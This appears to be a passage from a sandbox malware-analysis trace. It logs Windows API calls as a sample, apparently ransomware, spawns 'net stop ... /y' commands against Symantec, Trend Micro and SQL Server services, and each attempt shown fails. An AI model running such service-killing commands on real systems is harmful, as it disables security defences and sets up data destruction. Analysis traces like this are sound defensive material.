[0044.625] GetConsoleOutputCP () returned 0x1b5 [0044.626] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3e9080 | out: lpCPInfo=0x3e9080) returned 1 [0044.626] SetThreadUILanguage (LangId=0x0) returned 0x409 [0044.629] sprintf_s (in: _DstBuf=0x2ffc80, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0044.629] setlocale (category=0, locale=".437") returned="English_United States.437" [0044.631] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0044.631] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0044.631] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop Smcinst /y" [0044.631] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2ffa4c, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0044.631] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x62) returned 0x773c00 [0044.631] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0044.631] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2ffc50 | out: Buffer=0x2ffc50*=0x771c60) returned 0x0 [0044.631] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2ffc50 | out: Buffer=0x2ffc50*=0x771c78) returned 0x0 [0044.631] _fileno (_File=0x74eb2900) returned -2 [0044.631] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0044.631] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0044.632] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0044.632] _wcsicmp (_String1="config", _String2="stop") returned -16 [0044.632] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0044.632] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0044.632] _wcsicmp (_String1="file", _String2="stop") returned -13 [0044.632] _wcsicmp (_String1="files", _String2="stop") returned -13 [0044.632] _wcsicmp (_String1="group", _String2="stop") returned -12 [0044.632] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0044.632] _wcsicmp (_String1="help", _String2="stop") returned -11 [0044.632] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0044.632] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0044.632] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0044.632] _wcsicmp (_String1="session", _String2="stop") returned -15 [0044.632] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0044.632] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0044.632] _wcsicmp (_String1="share", _String2="stop") returned -12 [0044.632] _wcsicmp (_String1="start", _String2="stop") returned -14 [0044.632] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0044.632] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0044.632] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0044.632] _wcsicmp (_String1="accounts", _String2="Smcinst") returned -18 [0044.632] _wcsicmp (_String1="computer", _String2="Smcinst") returned -16 [0044.632] _wcsicmp (_String1="config", _String2="Smcinst") returned -16 [0044.632] _wcsicmp (_String1="continue", _String2="Smcinst") returned -16 [0044.632] _wcsicmp (_String1="cont", _String2="Smcinst") returned -16 [0044.632] _wcsicmp (_String1="file", _String2="Smcinst") returned -13 [0044.632] _wcsicmp (_String1="files", _String2="Smcinst") returned -13 [0044.632] _wcsicmp (_String1="group", _String2="Smcinst") returned -12 [0044.632] _wcsicmp (_String1="groups", _String2="Smcinst") returned -12 [0044.632] _wcsicmp (_String1="help", _String2="Smcinst") returned -11 [0044.632] _wcsicmp (_String1="helpmsg", _String2="Smcinst") returned -11 [0044.632] _wcsicmp (_String1="localgroup", _String2="Smcinst") returned -7 [0044.632] _wcsicmp (_String1="pause", _String2="Smcinst") returned -3 [0044.632] _wcsicmp (_String1="session", _String2="Smcinst") returned -8 [0044.632] _wcsicmp (_String1="sessions", _String2="Smcinst") returned -8 [0044.632] _wcsicmp (_String1="sess", _String2="Smcinst") returned -8 [0044.632] _wcsicmp (_String1="share", _String2="Smcinst") returned -5 [0044.633] _wcsicmp (_String1="start", _String2="Smcinst") returned 7 [0044.633] _wcsicmp (_String1="stats", _String2="Smcinst") returned 7 [0044.633] _wcsicmp (_String1="statistics", _String2="Smcinst") returned 7 [0044.633] _wcsicmp (_String1="stop", _String2="Smcinst") returned 7 [0044.633] _wcsicmp (_String1="time", _String2="Smcinst") returned 1 [0044.633] _wcsicmp (_String1="user", _String2="Smcinst") returned 2 [0044.633] _wcsicmp (_String1="users", _String2="Smcinst") returned 2 [0044.633] _wcsicmp (_String1="msg", _String2="Smcinst") returned -6 [0044.633] _wcsicmp (_String1="messenger", _String2="Smcinst") returned -6 [0044.633] _wcsicmp (_String1="receiver", _String2="Smcinst") returned -1 [0044.633] _wcsicmp (_String1="rcv", _String2="Smcinst") returned -1 [0044.633] _wcsicmp (_String1="netpopup", _String2="Smcinst") returned -5 [0044.633] _wcsicmp (_String1="redirector", _String2="Smcinst") returned -1 [0044.633] _wcsicmp (_String1="redir", _String2="Smcinst") returned -1 [0044.633] _wcsicmp (_String1="rdr", _String2="Smcinst") returned -1 [0044.633] _wcsicmp (_String1="workstation", _String2="Smcinst") returned 4 [0044.633] _wcsicmp (_String1="work", _String2="Smcinst") returned 4 [0044.633] _wcsicmp (_String1="wksta", _String2="Smcinst") returned 4 [0044.633] _wcsicmp (_String1="prdr", _String2="Smcinst") returned -3 [0044.633] _wcsicmp (_String1="devrdr", _String2="Smcinst") returned -15 [0044.633] _wcsicmp (_String1="lanmanworkstation", _String2="Smcinst") returned -7 [0044.633] _wcsicmp (_String1="server", _String2="Smcinst") returned -8 [0044.633] _wcsicmp (_String1="svr", _String2="Smcinst") returned 9 [0044.633] _wcsicmp (_String1="srv", _String2="Smcinst") returned 5 [0044.633] _wcsicmp (_String1="lanmanserver", _String2="Smcinst") returned -7 [0044.633] _wcsicmp (_String1="alerter", _String2="Smcinst") returned -18 [0044.633] _wcsicmp (_String1="netlogon", _String2="Smcinst") returned -5 [0044.633] _wcsupr (in: _String="Smcinst" | out: _String="SMCINST") returned="SMCINST" [0044.633] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x7754b8 [0044.636] GetServiceKeyNameW (in: hSCManager=0x7754b8, lpDisplayName="SMCINST", lpServiceName=0x3eaaf0, lpcchBuffer=0x2ffbec | out: lpServiceName="", lpcchBuffer=0x2ffbec) returned 0 [0044.637] _wcsicmp (_String1="msg", _String2="SMCINST") returned -6 [0044.637] _wcsicmp (_String1="messenger", _String2="SMCINST") returned -6 [0044.637] _wcsicmp (_String1="receiver", _String2="SMCINST") returned -1 [0044.637] _wcsicmp (_String1="rcv", _String2="SMCINST") returned -1 [0044.637] _wcsicmp (_String1="redirector", _String2="SMCINST") returned -1 [0044.637] _wcsicmp (_String1="redir", _String2="SMCINST") returned -1 [0044.637] _wcsicmp (_String1="rdr", _String2="SMCINST") returned -1 [0044.637] _wcsicmp (_String1="workstation", _String2="SMCINST") returned 4 [0044.637] _wcsicmp (_String1="work", _String2="SMCINST") returned 4 [0044.637] _wcsicmp (_String1="wksta", _String2="SMCINST") returned 4 [0044.637] _wcsicmp (_String1="prdr", _String2="SMCINST") returned -3 [0044.637] _wcsicmp (_String1="devrdr", _String2="SMCINST") returned -15 [0044.637] _wcsicmp (_String1="lanmanworkstation", _String2="SMCINST") returned -7 [0044.637] _wcsicmp (_String1="server", _String2="SMCINST") returned -8 [0044.637] _wcsicmp (_String1="svr", _String2="SMCINST") returned 9 [0044.637] _wcsicmp (_String1="srv", _String2="SMCINST") returned 5 [0044.637] _wcsicmp (_String1="lanmanserver", _String2="SMCINST") returned -7 [0044.637] _wcsicmp (_String1="alerter", _String2="SMCINST") returned -18 [0044.637] _wcsicmp (_String1="netlogon", _String2="SMCINST") returned -5 [0044.637] NetServiceControl (in: servername=0x0, service="SMCINST", opcode=0x0, arg=0x0, bufptr=0x2ffbe8 | out: bufptr=0x2ffbe8) returned 0x889 [0044.638] wcscpy_s (in: _Destination=0x3ea4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0044.638] LoadLibraryW (lpLibFileName="NETMSG") returned 0x73ef0000 [0044.639] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x73ef0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x3eb338, nSize=0x800, Arguments=0x3e9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0044.640] GetFileType (hFile=0x26c) returned 0x3 [0044.640] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x773fe8 [0044.640] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x773fe8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0044.640] WriteFile (in: hFile=0x26c, lpBuffer=0x773fe8*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x2ffb28, lpOverlapped=0x0 | out: lpBuffer=0x773fe8*, lpNumberOfBytesWritten=0x2ffb28*=0x1e, lpOverlapped=0x0) returned 1 [0044.640] LocalFree (hMem=0x773fe8) returned 0x0 [0044.640] GetFileType (hFile=0x26c) returned 0x3 [0044.640] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x776290 [0044.640] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x776290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nw", lpUsedDefaultChar=0x0) returned 2 [0044.640] WriteFile (in: hFile=0x26c, lpBuffer=0x776290*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2ffb28, lpOverlapped=0x0 | out: lpBuffer=0x776290*, lpNumberOfBytesWritten=0x2ffb28*=0x2, lpOverlapped=0x0) returned 1 [0044.640] LocalFree (hMem=0x776290) returned 0x0 [0044.640] _ultow (in: _Dest=0x889, _Radix=3144536 | out: _Dest=0x889) returned="2185" [0044.640] FormatMessageW (in: dwFlags=0x2800, lpSource=0x73ef0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x3eb338, nSize=0x800, Arguments=0x3e9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0044.640] GetFileType (hFile=0x26c) returned 0x3 [0044.640] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x776290 [0044.640] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x776290, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0044.641] WriteFile (in: hFile=0x26c, lpBuffer=0x776290*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x2ffb34, lpOverlapped=0x0 | out: lpBuffer=0x776290*, lpNumberOfBytesWritten=0x2ffb34*=0x34, lpOverlapped=0x0) returned 1 [0044.641] LocalFree (hMem=0x776290) returned 0x0 [0044.641] GetFileType (hFile=0x26c) returned 0x3 [0044.641] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x776290 [0044.641] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x776290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nw", lpUsedDefaultChar=0x0) returned 2 [0044.641] WriteFile (in: hFile=0x26c, lpBuffer=0x776290*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2ffb34, lpOverlapped=0x0 | out: lpBuffer=0x776290*, lpNumberOfBytesWritten=0x2ffb34*=0x2, lpOverlapped=0x0) returned 1 [0044.641] LocalFree (hMem=0x776290) returned 0x0 [0044.641] NetApiBufferFree (Buffer=0x771c60) returned 0x0 [0044.641] NetApiBufferFree (Buffer=0x771c78) returned 0x0 [0044.641] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop Smcinst /y" [0044.641] exit (_Code=2) Process: id = "79" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x47f9b000" os_pid = "0x84c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop MSSQLServerADHelper100 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 147 os_tid = 0x848 Process: id = "80" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x47f0c000" os_pid = "0x840" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "79" os_parent_pid = "0x84c" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQLServerADHelper100 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 148 os_tid = 0x850 [0045.008] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x27fb9c | out: lpSystemTimeAsFileTime=0x27fb9c*(dwLowDateTime=0xe5069d80, dwHighDateTime=0x1d57a86)) [0045.008] GetCurrentProcessId () returned 0x840 [0045.008] GetCurrentThreadId () returned 0x850 [0045.008] GetTickCount () returned 0x1146384 [0045.008] QueryPerformanceCounter (in: lpPerformanceCount=0x27fb94 | out: lpPerformanceCount=0x27fb94*=16529312992) returned 1 [0045.009] GetModuleHandleA (lpModuleName=0x0) returned 0x810000 [0045.009] __set_app_type (_Type=0x1) [0045.009] __p__fmode () returned 0x74eb31f4 [0045.009] __p__commode () returned 0x74eb31fc [0045.009] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x81ffe6) returned 0x0 [0045.009] __getmainargs (in: _Argc=0x829064, _Argv=0x82906c, _Env=0x829068, _DoWildCard=0, _StartInfo=0x829024 | out: _Argc=0x829064, _Argv=0x82906c, _Env=0x829068) returned 0 [0045.009] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0045.009] GetConsoleOutputCP () returned 0x1b5 [0045.009] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x829080 | out: lpCPInfo=0x829080) returned 1 [0045.009] SetThreadUILanguage (LangId=0x0) returned 0x409 [0045.013] sprintf_s (in: _DstBuf=0x27fb54, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0045.013] setlocale (category=0, locale=".437") returned="English_United States.437" [0045.015] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0045.015] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0045.015] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLServerADHelper100 /y" [0045.015] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x27f920, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0045.015] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x0, Size=0x80) returned 0x364bf8 [0045.015] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0045.015] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x27fb24 | out: Buffer=0x27fb24*=0x361c90) returned 0x0 [0045.015] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x27fb24 | out: Buffer=0x27fb24*=0x361ca8) returned 0x0 [0045.015] _fileno (_File=0x74eb2900) returned -2 [0045.015] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0045.015] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0045.015] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0045.015] _wcsicmp (_String1="config", _String2="stop") returned -16 [0045.015] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0045.015] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0045.015] _wcsicmp (_String1="file", _String2="stop") returned -13 [0045.015] _wcsicmp (_String1="files", _String2="stop") returned -13 [0045.015] _wcsicmp (_String1="group", _String2="stop") returned -12 [0045.016] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0045.016] _wcsicmp (_String1="help", _String2="stop") returned -11 [0045.016] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0045.016] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0045.016] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0045.016] _wcsicmp (_String1="session", _String2="stop") returned -15 [0045.016] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0045.016] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0045.016] _wcsicmp (_String1="share", _String2="stop") returned -12 [0045.016] _wcsicmp (_String1="start", _String2="stop") returned -14 [0045.016] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0045.016] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0045.016] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0045.016] _wcsicmp (_String1="accounts", _String2="MSSQLServerADHelper100") returned -12 [0045.016] _wcsicmp (_String1="computer", _String2="MSSQLServerADHelper100") returned -10 [0045.016] _wcsicmp (_String1="config", _String2="MSSQLServerADHelper100") returned -10 [0045.016] _wcsicmp (_String1="continue", _String2="MSSQLServerADHelper100") returned -10 [0045.016] _wcsicmp (_String1="cont", _String2="MSSQLServerADHelper100") returned -10 [0045.016] _wcsicmp (_String1="file", _String2="MSSQLServerADHelper100") returned -7 [0045.016] _wcsicmp (_String1="files", _String2="MSSQLServerADHelper100") returned -7 [0045.016] _wcsicmp (_String1="group", _String2="MSSQLServerADHelper100") returned -6 [0045.016] _wcsicmp (_String1="groups", _String2="MSSQLServerADHelper100") returned -6 [0045.016] _wcsicmp (_String1="help", _String2="MSSQLServerADHelper100") returned -5 [0045.016] _wcsicmp (_String1="helpmsg", _String2="MSSQLServerADHelper100") returned -5 [0045.016] _wcsicmp (_String1="localgroup", _String2="MSSQLServerADHelper100") returned -1 [0045.016] _wcsicmp (_String1="pause", _String2="MSSQLServerADHelper100") returned 3 [0045.016] _wcsicmp (_String1="session", _String2="MSSQLServerADHelper100") returned 6 [0045.016] _wcsicmp (_String1="sessions", _String2="MSSQLServerADHelper100") returned 6 [0045.016] _wcsicmp (_String1="sess", _String2="MSSQLServerADHelper100") returned 6 [0045.016] _wcsicmp (_String1="share", _String2="MSSQLServerADHelper100") returned 6 [0045.016] _wcsicmp (_String1="start", _String2="MSSQLServerADHelper100") returned 6 [0045.016] _wcsicmp (_String1="stats", _String2="MSSQLServerADHelper100") returned 6 [0045.016] _wcsicmp (_String1="statistics", _String2="MSSQLServerADHelper100") returned 6 [0045.016] _wcsicmp (_String1="stop", _String2="MSSQLServerADHelper100") returned 6 [0045.016] _wcsicmp (_String1="time", _String2="MSSQLServerADHelper100") returned 7 [0045.016] _wcsicmp (_String1="user", _String2="MSSQLServerADHelper100") returned 8 [0045.016] _wcsicmp (_String1="users", _String2="MSSQLServerADHelper100") returned 8 [0045.017] _wcsicmp (_String1="msg", _String2="MSSQLServerADHelper100") returned -12 [0045.017] _wcsicmp (_String1="messenger", _String2="MSSQLServerADHelper100") returned -14 [0045.017] _wcsicmp (_String1="receiver", _String2="MSSQLServerADHelper100") returned 5 [0045.017] _wcsicmp (_String1="rcv", _String2="MSSQLServerADHelper100") returned 5 [0045.017] _wcsicmp (_String1="netpopup", _String2="MSSQLServerADHelper100") returned 1 [0045.017] _wcsicmp (_String1="redirector", _String2="MSSQLServerADHelper100") returned 5 [0045.017] _wcsicmp (_String1="redir", _String2="MSSQLServerADHelper100") returned 5 [0045.017] _wcsicmp (_String1="rdr", _String2="MSSQLServerADHelper100") returned 5 [0045.017] _wcsicmp (_String1="workstation", _String2="MSSQLServerADHelper100") returned 10 [0045.017] _wcsicmp (_String1="work", _String2="MSSQLServerADHelper100") returned 10 [0045.017] _wcsicmp (_String1="wksta", _String2="MSSQLServerADHelper100") returned 10 [0045.017] _wcsicmp (_String1="prdr", _String2="MSSQLServerADHelper100") returned 3 [0045.017] _wcsicmp (_String1="devrdr", _String2="MSSQLServerADHelper100") returned -9 [0045.017] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLServerADHelper100") returned -1 [0045.017] _wcsicmp (_String1="server", _String2="MSSQLServerADHelper100") returned 6 [0045.017] _wcsicmp (_String1="svr", _String2="MSSQLServerADHelper100") returned 6 [0045.017] _wcsicmp (_String1="srv", _String2="MSSQLServerADHelper100") returned 6 [0045.017] _wcsicmp (_String1="lanmanserver", _String2="MSSQLServerADHelper100") returned -1 [0045.017] _wcsicmp (_String1="alerter", _String2="MSSQLServerADHelper100") returned -12 [0045.017] _wcsicmp (_String1="netlogon", _String2="MSSQLServerADHelper100") returned 1 [0045.017] _wcsupr (in: _String="MSSQLServerADHelper100" | out: _String="MSSQLSERVERADHELPER100") returned="MSSQLSERVERADHELPER100" [0045.017] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3654c8 [0045.056] GetServiceKeyNameW (in: hSCManager=0x3654c8, lpDisplayName="MSSQLSERVERADHELPER100", lpServiceName=0x82aaf0, lpcchBuffer=0x27fac0 | out: lpServiceName="", lpcchBuffer=0x27fac0) returned 0 [0045.056] _wcsicmp (_String1="msg", _String2="MSSQLSERVERADHELPER100") returned -12 [0045.056] _wcsicmp (_String1="messenger", _String2="MSSQLSERVERADHELPER100") returned -14 [0045.057] _wcsicmp (_String1="receiver", _String2="MSSQLSERVERADHELPER100") returned 5 [0045.057] _wcsicmp (_String1="rcv", _String2="MSSQLSERVERADHELPER100") returned 5 [0045.057] _wcsicmp (_String1="redirector", _String2="MSSQLSERVERADHELPER100") returned 5 [0045.057] _wcsicmp (_String1="redir", _String2="MSSQLSERVERADHELPER100") returned 5 [0045.057] _wcsicmp (_String1="rdr", _String2="MSSQLSERVERADHELPER100") returned 5 [0045.057] _wcsicmp (_String1="workstation", _String2="MSSQLSERVERADHELPER100") returned 10 [0045.057] _wcsicmp (_String1="work", _String2="MSSQLSERVERADHELPER100") returned 10 [0045.057] _wcsicmp (_String1="wksta", _String2="MSSQLSERVERADHELPER100") returned 10 [0045.057] _wcsicmp (_String1="prdr", _String2="MSSQLSERVERADHELPER100") returned 3 [0045.057] _wcsicmp (_String1="devrdr", _String2="MSSQLSERVERADHELPER100") returned -9 [0045.057] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLSERVERADHELPER100") returned -1 [0045.057] _wcsicmp (_String1="server", _String2="MSSQLSERVERADHELPER100") returned 6 [0045.057] _wcsicmp (_String1="svr", _String2="MSSQLSERVERADHELPER100") returned 6 [0045.057] _wcsicmp (_String1="srv", _String2="MSSQLSERVERADHELPER100") returned 6 [0045.057] _wcsicmp (_String1="lanmanserver", _String2="MSSQLSERVERADHELPER100") returned -1 [0045.057] _wcsicmp (_String1="alerter", _String2="MSSQLSERVERADHELPER100") returned -12 [0045.057] _wcsicmp (_String1="netlogon", _String2="MSSQLSERVERADHELPER100") returned 1 [0045.057] NetServiceControl (in: servername=0x0, service="MSSQLSERVERADHELPER100", opcode=0x0, arg=0x0, bufptr=0x27fabc | out: bufptr=0x27fabc) returned 0x889 [0045.058] wcscpy_s (in: _Destination=0x82a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0045.058] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74770000 [0045.060] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74770000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x82b338, nSize=0x800, Arguments=0x829dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0045.061] GetFileType (hFile=0x26c) returned 0x3 [0045.061] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x363ca0 [0045.061] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x363ca0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0045.061] WriteFile (in: hFile=0x26c, lpBuffer=0x363ca0*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x27f9fc, lpOverlapped=0x0 | out: lpBuffer=0x363ca0*, lpNumberOfBytesWritten=0x27f9fc*=0x1e, lpOverlapped=0x0) returned 1 [0045.061] LocalFree (hMem=0x363ca0) returned 0x0 [0045.061] GetFileType (hFile=0x26c) returned 0x3 [0045.061] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x366290 [0045.061] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x366290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n6", lpUsedDefaultChar=0x0) returned 2 [0045.062] WriteFile (in: hFile=0x26c, lpBuffer=0x366290*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x27f9fc, lpOverlapped=0x0 | out: lpBuffer=0x366290*, lpNumberOfBytesWritten=0x27f9fc*=0x2, lpOverlapped=0x0) returned 1 [0045.062] LocalFree (hMem=0x366290) returned 0x0 [0045.062] _ultow (in: _Dest=0x889, _Radix=2619948 | out: _Dest=0x889) returned="2185" [0045.062] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74770000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x82b338, nSize=0x800, Arguments=0x829dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0045.062] GetFileType (hFile=0x26c) returned 0x3 [0045.062] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x366290 [0045.062] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x366290, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0045.062] WriteFile (in: hFile=0x26c, lpBuffer=0x366290*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x27fa08, lpOverlapped=0x0 | out: lpBuffer=0x366290*, lpNumberOfBytesWritten=0x27fa08*=0x34, lpOverlapped=0x0) returned 1 [0045.062] LocalFree (hMem=0x366290) returned 0x0 [0045.062] GetFileType (hFile=0x26c) returned 0x3 [0045.062] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x366290 [0045.062] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x366290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n6", lpUsedDefaultChar=0x0) returned 2 [0045.062] WriteFile (in: hFile=0x26c, lpBuffer=0x366290*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x27fa08, lpOverlapped=0x0 | out: lpBuffer=0x366290*, lpNumberOfBytesWritten=0x27fa08*=0x2, lpOverlapped=0x0) returned 1 [0045.062] LocalFree (hMem=0x366290) returned 0x0 [0045.062] NetApiBufferFree (Buffer=0x361c90) returned 0x0 [0045.063] NetApiBufferFree (Buffer=0x361ca8) returned 0x0 [0045.063] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLServerADHelper100 /y" [0045.063] exit (_Code=2) Process: id = "81" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x486a0000" os_pid = "0x85c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop TmCCSF /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT 